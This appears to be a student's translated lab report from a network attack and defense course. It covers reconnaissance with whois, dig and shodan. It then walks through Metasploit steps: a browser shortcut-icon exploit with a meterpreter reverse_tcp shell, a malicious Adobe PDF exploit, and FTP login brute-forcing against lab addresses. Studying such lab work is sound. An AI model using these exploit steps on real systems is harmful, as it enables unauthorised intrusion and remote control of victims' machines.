20155235 "Network Attack and Defense" Experiment 6 Information Collection and Vulnerability Scanning
Experimental content
Application of various search techniques
Query of DNS IP registration information
Basic scanning techniques: host discovery, port scanning, OS and service version detection, enumeration of specific services
Vulnerability Scanning: Can scan, read reports, check vulnerability descriptions, and patch vulnerabilities
Experiment 1. Application of various search techniques
whois
- Use the whois command to query information
The result is shown in the figure
nslookup
- get
dig -h
help
- DNS server query results and cached results of other websites
- Use the shodan search engine to query, get:
- IP reverse domain name query, get:
IP2Location to query, get:
tracert route detection
- Windows case:
- Linux situation:
wonderful difference, emmn... Baidu's address
Experiment 2 Attacks on Browsers
- Enter in the terminal of kali to
msfconsole
enter the console - Enter
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
, get and use browser exploits - Enter
set payload windows/meterpreter/reverse_tcp
, select backlink load - Enter
set SRVHOST 192.168.129.133
, set the server host IP - Enter
set LHOST 192.168.129.133
, set the IP of the attacking machine - enter
exploit
, gethttp://192.168.129.133:80/
- Access on the target machine
http://192.168.129.133:80/
, a window will pop up
- At the same time, the attacker's computer gets the connection, and the input is
sessions
viewed to the computer that bounces the link to the host.
input
sessions -i 2
control target
Experiment 3 Attacks on Clients
- Enter
exploit/windows/fileformat/adobe_cooltype_sing
, determine the attack plan - Enter
set LHOST 192.168.129.133
, set the IP of the attacking machine - Enter
set LPORT 5235
, set the attack port Transfer the generated pdf to the target machine to open, and start listening on kali at the same time
Experiment 4 applies an auxiliary module
- Enter to
show auxiliary
view all auxiliary modules - Use
scanner/http/dir_scanner
scan directory Select
ftp_login
, scan192.168.3.44
to192.168.43.48
five, use the user name 20151124 (I randomly typed it), and the password is 123456.
Experiment results: Miscalculation! Actually not!question
- Explain in your own words what is exploit, payload, encode.
Exploit is to use, find the loophole and use it!
The payload is a carrier that allows us to put the virus in and transmit it to other people's computers.
Encode encryption, in order to prevent our virus from being detected. The encryption method
Experimental experience
From the fourth test, I had an idea of installing a memory stick. By this experiment, the idea finally took root. I want to install an 8G memory stick! ! ! ! ! Otherwise, the virtual machine can't be opened, isn't it funny!